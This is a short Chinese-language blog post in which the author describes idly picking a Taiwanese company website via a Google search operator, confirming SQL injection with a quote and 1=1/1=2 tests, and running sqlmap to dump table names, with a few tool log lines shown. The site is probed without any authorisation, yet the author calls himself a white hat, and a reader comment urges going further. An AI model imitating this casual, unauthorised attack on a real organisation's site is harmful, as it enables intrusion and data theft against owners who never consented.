周日啦,多么好的天气,苦逼的我还没对象,在家呆着太过于无聊,顺手挖了一个台湾的站。
谷歌语法搜索了一下 .tw inurl:asp?
然后搜索到了一个很牛逼的字眼xxxxxx股份公司,本以为没有sql注入,单纯的进去看看台湾公司官网。
http://wwwxxxxxxxx.com.tw/cov.asp?ID=2
加上单引号之后发现报错了, and1=1正常 1=2不正常了 。 这我怎么可能会放过,虽然网站应该被搞烂了,但是多我一个不多
提出sqlmap进行跑一跑
剩下的就简单了 表啊 字段啊 没得毛病
[20:28:34] [INFO] retrieved: contact
[20:28:36] [INFO] retrieved: admin
[20:28:49] [INFO] retrieved: news
[20:28:36] [INFO] retrieved: admin
[20:28:49] [INFO] retrieved: news
嘿嘿嘿 出现表名了
作为一名白帽子,我怎么会接着深入挖掘呢 就这样纸了~~
您可能感兴趣的文章
本文地址:http://www.ouyangxiaoze.com/2019/04/36.html
文章标签:sqlmap , 渗透 , 渗透测试
版权声明:本文为原创文章,版权归 欧阳小泽 所有,欢迎分享本文,转载请保留出处!
文章标签:sqlmap , 渗透 , 渗透测试
版权声明:本文为原创文章,版权归 欧阳小泽 所有,欢迎分享本文,转载请保留出处!
发表于 2020-04-09 11:42 沙发
日他就完了